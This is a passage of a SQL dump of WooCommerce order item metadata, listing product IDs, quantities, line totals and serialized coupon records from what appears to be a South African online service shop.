_product_id','28088'),(719,83,'_variation_id','0'),(720,83,'_qty','1'),(721,83,'_tax_class',''),(722,83,'_line_subtotal','999'),(723,83,'_line_subtotal_tax','0'),(724,83,'_line_total','999'),(725,83,'_line_tax','0'),(726,83,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(727,84,'_product_id','70'),(728,84,'_variation_id','0'),(729,84,'_qty','1'),(730,84,'_tax_class',''),(731,84,'_line_subtotal','450'),(732,84,'_line_subtotal_tax','0'),(733,84,'_line_total','450'),(734,84,'_line_tax','0'),(735,84,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(736,85,'_product_id','72'),(737,85,'_variation_id','0'),(738,85,'_qty','1'),(739,85,'_tax_class',''),(740,85,'_line_subtotal','3500'),(741,85,'_line_subtotal_tax','0'),(742,85,'_line_total','3500'),(743,85,'_line_tax','0'),(744,85,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(745,86,'_product_id','74'),(746,86,'_variation_id','0'),(747,86,'_qty','1'),(748,86,'_tax_class',''),(749,86,'_line_subtotal','450'),(750,86,'_line_subtotal_tax','0'),(751,86,'_line_total','450'),(752,86,'_line_tax','0'),(753,86,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(754,87,'_product_id','237'),(755,87,'_variation_id','0'),(756,87,'_qty','1'),(757,87,'_tax_class',''),(758,87,'_line_subtotal','5000'),(759,87,'_line_subtotal_tax','0'),(760,87,'_line_total','5000'),(761,87,'_line_tax','0'),(762,87,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(763,88,'_product_id','69'),(764,88,'_variation_id','0'),(765,88,'_qty','1'),(766,88,'_tax_class',''),(767,88,'_line_subtotal','450'),(768,88,'_line_subtotal_tax','0'),(769,88,'_line_total','450'),(770,88,'_line_tax','0'),(771,88,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(772,89,'_product_id','68'),(773,89,'_variation_id','0'),(774,89,'_qty','1'),(775,89,'_tax_class',''),(776,89,'_line_subtotal','450'),(777,89,'_line_subtotal_tax','0'),(778,89,'_line_total','450'),(779,89,'_line_tax','0'),(780,89,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(781,90,'_product_id','67'),(782,90,'_variation_id','0'),(783,90,'_qty','1'),(784,90,'_tax_class',''),(785,90,'_line_subtotal','450'),(786,90,'_line_subtotal_tax','0'),(787,90,'_line_total','450'),(788,90,'_line_tax','0'),(789,90,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(790,91,'_product_id','65'),(791,91,'_variation_id','0'),(792,91,'_qty','1'),(793,91,'_tax_class',''),(794,91,'_line_subtotal','450'),(795,91,'_line_subtotal_tax','0'),(796,91,'_line_total','450'),(797,91,'_line_tax','0'),(798,91,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(799,92,'_product_id','79'),(800,92,'_variation_id','0'),(801,92,'_qty','1'),(802,92,'_tax_class',''),(803,92,'_line_subtotal','199'),(804,92,'_line_subtotal_tax','0'),(805,92,'_line_total','199'),(806,92,'_line_tax','0'),(807,92,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(808,93,'_product_id','80'),(809,93,'_variation_id','0'),(810,93,'_qty','1'),(811,93,'_tax_class',''),(812,93,'_line_subtotal','199'),(813,93,'_line_subtotal_tax','0'),(814,93,'_line_total','199'),(815,93,'_line_tax','0'),(816,93,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(817,94,'_product_id','62'),(818,94,'_variation_id','0'),(819,94,'_qty','1'),(820,94,'_tax_class',''),(821,94,'_line_subtotal','4650'),(822,94,'_line_subtotal_tax','0'),(823,94,'_line_total','4650'),(824,94,'_line_tax','0'),(825,94,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(826,95,'_product_id','59'),(827,95,'_variation_id','0'),(828,95,'_qty','1'),(829,95,'_tax_class',''),(830,95,'_line_subtotal','1500'),(831,95,'_line_subtotal_tax','0'),(832,95,'_line_total','1500'),(833,95,'_line_tax','0'),(834,95,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(835,96,'_product_id','78'),(836,96,'_variation_id','0'),(837,96,'_qty','1'),(838,96,'_tax_class',''),(839,96,'_line_subtotal','2250'),(840,96,'_line_subtotal_tax','0'),(841,96,'_line_total','2250'),(842,96,'_line_tax','0'),(843,96,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(844,97,'_product_id','77'),(845,97,'_variation_id','0'),(846,97,'_qty','1'),(847,97,'_tax_class',''),(848,97,'_line_subtotal','3500'),(849,97,'_line_subtotal_tax','0'),(850,97,'_line_total','3500'),(851,97,'_line_tax','0'),(852,97,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(853,98,'_product_id','76'),(854,98,'_variation_id','0'),(855,98,'_qty','1'),(856,98,'_tax_class',''),(857,98,'_line_subtotal','750'),(858,98,'_line_subtotal_tax','0'),(859,98,'_line_total','750'),(860,98,'_line_tax','0'),(861,98,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(862,99,'_product_id','75'),(863,99,'_variation_id','0'),(864,99,'_qty','1'),(865,99,'_tax_class',''),(866,99,'_line_subtotal','1500'),(867,99,'_line_subtotal_tax','0'),(868,99,'_line_total','1500'),(869,99,'_line_tax','0'),(870,99,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(871,100,'_product_id','64'),(872,100,'_variation_id','0'),(873,100,'_qty','1'),(874,100,'_tax_class',''),(875,100,'_line_subtotal','2250'),(876,100,'_line_subtotal_tax','0'),(877,100,'_line_total','2250'),(878,100,'_line_tax','0'),(879,100,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(880,101,'_product_id','28'),(881,101,'_variation_id','0'),(882,101,'_qty','1'),(883,101,'_tax_class',''),(884,101,'_line_subtotal','750'),(885,101,'_line_subtotal_tax','0'),(886,101,'_line_total','750'),(887,101,'_line_tax','0'),(888,101,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(889,102,'_product_id','59'),(890,102,'_variation_id','0'),(891,102,'_qty','1'),(892,102,'_tax_class',''),(893,102,'_line_subtotal','1500'),(894,102,'_line_subtotal_tax','0'),(895,102,'_line_total','1500'),(896,102,'_line_tax','0'),(897,102,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(898,103,'_product_id','59'),(899,103,'_variation_id','0'),(900,103,'_qty','1'),(901,103,'_tax_class',''),(902,103,'_line_subtotal','1500'),(903,103,'_line_subtotal_tax','0'),(904,103,'_line_total','1200'),(905,103,'_line_tax','0'),(906,103,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(907,104,'_product_id','75'),(908,104,'_variation_id','0'),(909,104,'_qty','1'),(910,104,'_tax_class',''),(911,104,'_line_subtotal','1500'),(912,104,'_line_subtotal_tax','0'),(913,104,'_line_total','1200'),(914,104,'_line_tax','0'),(915,104,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(916,105,'discount_amount','600'),(917,105,'discount_amount_tax','0'),(918,105,'coupon_data','a:25:{s:2:\"id\";i:28957;s:4:\"code\";s:9:\"customise\";s:6:\"amount\";s:2:\"20\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2017-11-14 12:10:58.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2017-11-19 19:04:49.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:7:\"percent\";s:11:\"description\";s:52:\"Applies a 20% discount on purchases of R1000 or more\";s:11:\"usage_count\";i:0;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:0:{}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:4:\"1000\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"used_by\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(919,106,'_product_id','70'),(920,106,'_variation_id','0'),(921,106,'_qty','1'),(922,106,'_tax_class',''),(923,106,'_line_subtotal','450'),(924,106,'_line_subtotal_tax','0'),(925,106,'_line_total','450'),(926,106,'_line_tax','0'),(927,106,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(928,107,'_product_id','67'),(929,107,'_variation_id','0'),(930,107,'_qty','1'),(931,107,'_tax_class',''),(932,107,'_line_subtotal','450'),(933,107,'_line_subtotal_tax','0'),(934,107,'_line_total','450'),(935,107,'_line_tax','0'),(936,107,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(937,108,'_product_id','28091'),(938,108,'_variation_id','0'),(939,108,'_qty','1'),(940,108,'_tax_class',''),(941,108,'_line_subtotal','4999'),(942,108,'_line_subtotal_tax','0'),(943,108,'_line_total','4999'),(944,108,'_line_tax','0'),(945,108,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(946,109,'_product_id','28'),(947,109,'_variation_id','0'),(948,109,'_qty','1'),(949,109,'_tax_class',''),(950,109,'_line_subtotal','750'),(951,109,'_line_subtotal_tax','0'),(952,109,'_line_total','750'),(953,109,'_line_tax','0'),(954,109,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(955,110,'_product_id','59'),(956,110,'_variation_id','0'),(957,110,'_qty','1'),(958,110,'_tax_class',''),(959,110,'_line_subtotal','1500'),(960,110,'_line_subtotal_tax','0'),(961,110,'_line_total','1500'),(962,110,'_line_tax','0'),(963,110,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(964,111,'_product_id','64'),(965,111,'_variation_id','0'),(966,111,'_qty','1'),(967,111,'_tax_class',''),(968,111,'_line_subtotal','2250'),(969,111,'_line_subtotal_tax','0'),(970,111,'_line_total','2250'),(971,111,'_line_tax','0'),(972,111,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(973,112,'_product_id','62'),(974,112,'_variation_id','0'),(975,112,'_qty','1'),(976,112,'_tax_class',''),(977,112,'_line_subtotal','4650'),(978,112,'_line_subtotal_tax','0'),(979,112,'_line_total','4650'),(980,112,'_line_tax','0'),(981,112,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(982,113,'_product_id','237'),(983,113,'_variation_id','0'),(984,113,'_qty','1'),(985,113,'_tax_class',''),(986,113,'_line_subtotal','5000'),(987,113,'_line_subtotal_tax','0'),(988,113,'_line_total','5000'),(989,113,'_line_tax','0'),(990,113,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(991,114,'_product_id','75'),(992,114,'_variation_id','0'),(993,114,'_qty','1'),(994,114,'_tax_class',''),(995,114,'_line_subtotal','1500'),(996,114,'_line_subtotal_tax','0'),(997,114,'_line_total','1500'),(998,114,'_line_tax','0'),(999,114,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1000,115,'_product_id','76'),(1001,115,'_variation_id','0'),(1002,115,'_qty','1'),(1003,115,'_tax_class',''),(1004,115,'_line_subtotal','750'),(1005,115,'_line_subtotal_tax','0'),(1006,115,'_line_total','750'),(1007,115,'_line_tax','0'),(1008,115,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1009,116,'_product_id','74'),(1010,116,'_variation_id','0'),(1011,116,'_qty','1'),(1012,116,'_tax_class',''),(1013,116,'_line_subtotal','450'),(1014,116,'_line_subtotal_tax','0'),(1015,116,'_line_total','450'),(1016,116,'_line_tax','0'),(1017,116,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1018,117,'_product_id','78'),(1019,117,'_variation_id','0'),(1020,117,'_qty','1'),(1021,117,'_tax_class',''),(1022,117,'_line_subtotal','2250'),(1023,117,'_line_subtotal_tax','0'),(1024,117,'_line_total','2250'),(1025,117,'_line_tax','0'),(1026,117,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1027,118,'_product_id','77'),(1028,118,'_variation_id','0'),(1029,118,'_qty','1'),(1030,118,'_tax_class',''),(1031,118,'_line_subtotal','3500'),(1032,118,'_line_subtotal_tax','0'),(1033,118,'_line_total','3500'),(1034,118,'_line_tax','0'),(1035,118,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1036,119,'_product_id','70'),(1037,119,'_variation_id','0'),(1038,119,'_qty','1'),(1039,119,'_tax_class',''),(1040,119,'_line_subtotal','450'),(1041,119,'_line_subtotal_tax','0'),(1042,119,'_line_total','450'),(1043,119,'_line_tax','0'),(1044,119,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1045,120,'_product_id','65'),(1046,120,'_variation_id','0'),(1047,120,'_qty','1'),(1048,120,'_tax_class',''),(1049,120,'_line_subtotal','450'),(1050,120,'_line_subtotal_tax','0'),(1051,120,'_line_total','450'),(1052,120,'_line_tax','0'),(1053,120,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1054,121,'_product_id','67'),(1055,121,'_variation_id','0'),(1056,121,'_qty','1'),(1057,121,'_tax_class',''),(1058,121,'_line_subtotal','450'),(1059,121,'_line_subtotal_tax','0'),(1060,121,'_line_total','450'),(1061,121,'_line_tax','0'),(1062,121,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1063,122,'_product_id','69'),(1064,122,'_variation_id','0'),(1065,122,'_qty','1'),(1066,122,'_tax_class',''),(1067,122,'_line_subtotal','450'),(1068,122,'_line_subtotal_tax','0'),(1069,122,'_line_total','450'),(1070,122,'_line_tax','0'),(1071,122,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1072,123,'_product_id','68'),(1073,123,'_variation_id','0'),(1074,123,'_qty','1'),(1075,123,'_tax_class',''),(1076,123,'_line_subtotal','450'),(1077,123,'_line_subtotal_tax','0'),(1078,123,'_line_total','450'),(1079,123,'_line_tax','0'),(1080,123,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1081,124,'_product_id','72'),(1082,124,'_variation_id','0'),(1083,124,'_qty','1'),(1084,124,'_tax_class',''),(1085,124,'_line_subtotal','3500'),(1086,124,'_line_subtotal_tax','0'),(1087,124,'_line_total','3500'),(1088,124,'_line_tax','0'),(1089,124,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1090,125,'_product_id','79'),(1091,125,'_variation_id','0'),(1092,125,'_qty','1'),(1093,125,'_tax_class',''),(1094,125,'_line_subtotal','199'),(1095,125,'_line_subtotal_tax','0'),(1096,125,'_line_total','199'),(1097,125,'_line_tax','0'),(1098,125,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1099,126,'_product_id','80'),(1100,126,'_variation_id','0'),(1101,126,'_qty','1'),(1102,126,'_tax_class',''),(1103,126,'_line_subtotal','199'),(1104,126,'_line_subtotal_tax','0'),(1105,126,'_line_total','199'),(1106,126,'_line_tax','0'),(1107,126,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1108,127,'_product_id','28088'),(1109,127,'_variation_id','0'),(1110,127,'_qty','1'),(1111,127,'_tax_class',''),(1112,127,'_line_subtotal','999'),(1113,127,'_line_subtotal_tax','0'),(1114,127,'_line_total','999'),(1115,127,'_line_tax','0'),(1116,127,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1117,128,'_product_id','28090'),(1118,128,'_variation_id','0'),(1119,128,'_qty','1'),(1120,128,'_tax_class',''),(1121,128,'_line_subtotal','1699'),(1122,128,'_line_subtotal_tax','0'),(1123,128,'_line_total','1699'),(1124,128,'_line_tax','0'),(1125,128,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1126,129,'_product_id','28091'),(1127,129,'_variation_id','0'),(1128,129,'_qty','1'),(1129,129,'_tax_class',''),(1130,129,'_line_subtotal','4999'),(1131,129,'_line_subtotal_tax','0'),(1132,129,'_line_total','4999'),(1133,129,'_line_tax','0'),(1134,129,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1135,130,'_product_id','28092'),(1136,130,'_variation_id','0'),(1137,130,'_qty','1'),(1138,130,'_tax_class',''),(1139,130,'_line_subtotal','5999'),(1140,130,'_line_subtotal_tax','0'),(1141,130,'_line_total','5999'),(1142,130,'_line_tax','0'),(1143,130,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1144,131,'_product_id','79'),(1145,131,'_variation_id','0'),(1146,131,'_qty','1'),(1147,131,'_tax_class',''),(1148,131,'_line_subtotal','199'),(1149,131,'_line_subtotal_tax','0'),(1150,131,'_line_total','199'),(1151,131,'_line_tax','0'),(1152,131,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1153,132,'_product_id','59'),(1154,132,'_variation_id','0'),(1155,132,'_qty','1'),(1156,132,'_tax_class',''),(1157,132,'_line_subtotal','1500'),(1158,132,'_line_subtotal_tax','0'),(1159,132,'_line_total','1500'),(1160,132,'_line_tax','0'),(1161,132,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1162,133,'_product_id','70'),(1163,133,'_variation_id','0'),(1164,133,'_qty','1'),(1165,133,'_tax_class',''),(1166,133,'_line_subtotal','450'),(1167,133,'_line_subtotal_tax','0'),(1168,133,'_line_total','450'),(1169,133,'_line_tax','0'),(1170,133,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1171,134,'_product_id','70'),(1172,134,'_variation_id','0'),(1173,134,'_qty','1'),(1174,134,'_tax_class',''),(1175,134,'_line_subtotal','450'),(1176,134,'_line_subtotal_tax','0'),(1177,134,'_line_total','450'),(1178,134,'_line_tax','0'),(1179,134,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1180,135,'_product_id','59'),(1181,135,'_variation_id','0'),(1182,135,'_qty','1'),(1183,135,'_tax_class',''),(1184,135,'_line_subtotal','1500'),(1185,135,'_line_subtotal_tax','0'),(1186,135,'_line_total','1500'),(1187,135,'_line_tax','0'),(1188,135,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1189,136,'_product_id','79'),(1190,136,'_variation_id','0'),(1191,136,'_qty','1'),(1192,136,'_tax_class',''),(1193,136,'_line_subtotal','199'),(1194,136,'_line_subtotal_tax','0'),(1195,136,'_line_total','199'),(1196,136,'_line_tax','0'),(1197,136,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1198,137,'_product_id','80'),(1199,137,'_variation_id','0'),(1200,137,'_qty','1'),(1201,137,'_tax_class',''),(1202,137,'_line_subtotal','199'),(1203,137,'_line_subtotal_tax','0'),(1204,137,'_line_total','199'),(1205,137,'_line_tax','0'),(1206,137,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1207,138,'_product_id','79'),(1208,138,'_variation_id','0'),(1209,138,'_qty','1'),(1210,138,'_tax_class',''),(1211,138,'_line_subtotal','199'),(1212,138,'_line_subtotal_tax','0'),(1213,138,'_line_total','199'),(1214,138,'_line_tax','0'),(1215,138,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1216,139,'_product_id','79'),(1217,139,'_variation_id','0'),(1218,139,'_qty','1'),(1219,139,'_tax_class',''),(1220,139,'_line_subtotal','199'),(1221,139,'_line_subtotal_tax','0'),(1222,139,'_line_total','19.9'),(1223,139,'_line_tax','0'),(1224,139,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1225,140,'discount_amount','179.1'),(1226,140,'discount_amount_tax','0'),(1227,140,'coupon_data','a:25:{s:2:\"id\";i:29197;s:4:\"code\";s:14:\"wajoodeen51544\";s:6:\"amount\";s:2:\"90\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2018-05-14 14:07:08.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2018-05-14 14:07:26.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2018-05-14 22:00:00.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"discount_type\";s:7:\"percent\";s:11:\"description\";s:19:\"90% off for testing\";s:11:\"usage_count\";i:0;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:0:{}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:2;s:20:\"usage_limit_per_user\";i:2;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:0;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"used_by\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1291,148,'_product_id','59'),(1292,148,'_variation_id','0'),(1293,148,'_qty','1'),(1294,148,'_tax_class',''),(1295,148,'_line_subtotal','1500'),(1296,148,'_line_subtotal_tax','0'),(1297,148,'_line_total','1500'),(1298,148,'_line_tax','0'),(1299,148,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1309,150,'_product_id','28'),(1310,150,'_variation_id','0'),(1311,150,'_qty','1'),(1312,150,'_tax_class',''),(1313,150,'_line_subtotal','750'),(1314,150,'_line_subtotal_tax','0'),(1315,150,'_line_total','750'),(1316,150,'_line_tax','0'),(1317,150,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1624,191,'_product_id','28'),(1625,191,'_variation_id','0'),(1626,191,'_qty','1'),(1627,191,'_tax_class',''),(1628,191,'_line_subtotal','750'),(1629,191,'_line_subtotal_tax','0'),(1630,191,'_line_total','750'),(1631,191,'_line_tax','0'),(1632,191,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1633,192,'_product_id','29583'),(1634,192,'_variation_id','0'),(1635,192,'_qty','1'),(1636,192,'_tax_class',''),(1637,192,'_line_subtotal','990'),(1638,192,'_line_subtotal_tax','0'),(1639,192,'_line_total','990'),(1640,192,'_line_tax','0'),(1641,192,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1642,193,'_product_id','28'),(1643,193,'_variation_id','0'),(1644,193,'_qty','1'),(1645,193,'_tax_class',''),(1646,193,'_line_subtotal','750'),(1647,193,'_line_subtotal_tax','0'),(1648,193,'_line_total','199'),(1649,193,'_line_tax','0'),(1650,193,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1651,194,'_product_id','29583'),(1652,194,'_variation_id','0'),(1653,194,'_qty','1'),(1654,194,'_tax_class',''),(1655,194,'_line_subtotal','990'),(1656,194,'_line_subtotal_tax','0'),(1657,194,'_line_total','792'),(1658,194,'_line_tax','0'),(1659,194,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1660,195,'discount_amount','551'),(1661,195,'discount_amount_tax','0'),(1662,195,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 14:53:25.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-29 22:00:00.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:1;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1663,196,'discount_amount','198'),(1664,196,'discount_amount_tax','0'),(1665,196,'coupon_data','a:24:{s:2:\"id\";i:29813;s:4:\"code\";s:11:\"countmeless\";s:6:\"amount\";s:3:\"198\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:56:37.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-07 07:14:52.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-29 22:00:00.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:31:\"Discount on Zoho annual package\";s:11:\"usage_count\";i:1;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:1:{i:0;i:29583;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:5;s:20:\"usage_limit_per_user\";i:5;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:0;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(1729,206,'_product_id','29681'),(1730,206,'_variation_id','0'),(1731,206,'_qty','1'),(1732,206,'_tax_class',''),(1733,206,'_line_subtotal','135'),(1734,206,'_line_subtotal_tax','0'),(1735,206,'_line_total','135'),(1736,206,'_line_tax','0'),(1737,206,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1738,207,'_product_id','29583'),(1739,207,'_variation_id','0'),(1740,207,'_qty','1'),(1741,207,'_tax_class',''),(1742,207,'_line_subtotal','990'),(1743,207,'_line_subtotal_tax','0'),(1744,207,'_line_total','792'),(1745,207,'_line_tax','0'),(1746,207,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtota